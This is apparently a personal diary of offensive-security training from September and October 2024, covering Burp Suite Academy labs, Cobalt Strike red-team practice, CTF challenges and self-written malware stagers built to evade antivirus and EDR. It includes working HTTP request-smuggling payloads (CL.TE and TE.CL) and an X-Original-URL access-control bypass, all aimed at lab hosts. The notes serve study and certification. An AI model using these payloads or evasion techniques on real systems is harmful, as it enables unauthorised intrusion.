Daily diary
This is a collection of my daily adventures in cyber learning
24.10.2024
Malware development
- Spent all week trying to defeat Elastic EDR
- Today I DID IT
18.10.2024
RTO exam day 1
- Finished all machines
- Was fun
17.10.2024
Home lab setup
-Setup ElasticSearch and Kibana with Fleet Server and EDR
16.10.2024
RTO
- played around with cobalt strike, exam prep
15.10.2024
Malware development
- Created a stager using Local Mapping Injection method
Red Team Ops
- Played around with bypassing defender with UAC-bypasses
14.10.2024
Malware development
- Created a stager using Early Bird APC method
13.10.2024
Malware development
- Thread-hijacking stager
- APC-injection stager
12.10.2024
Malware development
- Setup Dev environment
- Made basic template for a stager which uses AES and Base64 to avoid AV
11.10.2024
RTO
- Setup PortBender and SOCKS proxy via Cobalt Strike
10.10.2024
Off day
- Played around with friends new WooCommerce store
9.10.2024
Lazy day
- Played around with Active Directory Certificate Services on RTO
8.10.2024
Burp Suite
- Got exam result (passed)
- Active Directory on RTO
7.10.2024
RTO
- Cobalt Strike
- Created a custom CNA
6.10
RTO
- Got another month on RTO labs
- Antivirus evasion with Cobalt Strike
- Mostly a refresher
5.10.2024
Huntress CTF
- Did one of the most useless challenges to date
HTB Academy
- Started Advanced Deserialization Attacks module
- Dotnet deserialization vulns
4.10.2024
Burpsuite exam
- Got all the solutions, waiting for the final result, should pass unless something weird happens
Huntress CTF
- Some bullshit challanges time around
3.10.2024
Huntress CTF!
- Some log analysis, nothing interesting
- Did some dynamic analysis on a powershell script via procmon
2.10.2024
Huntress CTF !
- Some phishing, nothing really exciting here
1.10.2024
Huntress CTF!
- jse file decrypting!
- can be done with https://github.com/sstraw/scrdec
- UPDATE: Even better! Use CyberChef!!!
30.9.2024
Burpsuite Academy
-Random labs here and there
29.9.2024
Burpsuite Academy
- Some mystery boxes, tried SQL injection via burp
28.9.2024
Burpsuite Academy
Practice exam
- Did another practice exam
- Did not pass on time again (had some breaks, was very close on first try even with breaks)
- Second try managed to solve it in very little time
XSS practice
- Did some labs to practice XSS filter evasion
27.9.2024
Burpsuite academy
Did pracice exam and some mystery boxes
Failed on time, managed to solve it on second try
Need to focus more on filter evasion
26.9.2024
BurpSuite Academy
Access Control
- Nothing really new here, good refresher
- Some headers to try bypass restricted routes:
X-Original-URL
X-Rewrite-URL
Eg
GET / HTTP/2
Host: 0a3600fd0451e51281233422003600f9.web-security-academy.net
X-Original-Url: /admin
Cache flaws
- Same here, HTB EasterBunny taught me well on the cache things!
- One random trick: language cookies can be also cached, rarely, but sometimes
25.9.2024
Burpsuite Academy
Request smuggling
Tried to understand how this vuln actually works
1) Cl.TE
Frontend server sends content according to the Content-Length header. Backend uses Transfer-Encoding to detect request length
This can be detected by sending two requests in one connection, Content-length header can be length of the transfer-encoding part and the second request
Example:
POST / HTTP/1.1
Host: 0aff002304fcf3238029800a00c400e7.web-security-academy.net
Content-Length: 49
Transfer-Encoding: chunked
e
q=smuggling&x=
0
GET /404 HTTP/1.1
Foo: x
Here, content length is equal to everything after the first headers. Transfer-Encoding size is put as e (12 in decimal) which includes the "q=smuggling&x=" part. Since frontend uses CL it sends both of these requests in the same time and backend processes these as separate requests. This means that backend sends us a response and starts waiting for end of our smuggled request "GET /404". After we or someone else sends a request they receive error 404 since there is no /404 path.
2) TE.CL
- This works in reverse. Frontend uses Transfer-Encoding header and Backend uses Content-Length. We send a request with small Content-Length header value and include our smuggled request in the Transfer-Encoding part of the request
Example:
POST / HTTP/1.1
Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
9e
GET /404 HTTP/1.1
Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
x=
0
There, content-length is 4 and it includes data just before the next "GET". Transfer-Encoding length (9e) includes the second request. Since frontend uses TE it sends the request as one. Frontend processes these as two requests, and the next request will be the GET /404
24.9.2024
Browsed through BurpSuite Academy
Logic bugs
Nothing major, just a reminder to try to always go with unintended application flow and try to go with unexpected or intentionally missing parameters. Also, skip events when possible (don't follow redirects etc..)
Eg. with numbers use negative or very big numbers, On strings use long strings.
Some basic deserilization
Nothing new, nice reminder of mostly php deserilization vulnerabilities
Nice caviat: when comparing number zero to string loosely on PHP it returns always true. Eg
if(0 == "test") {echo "???";}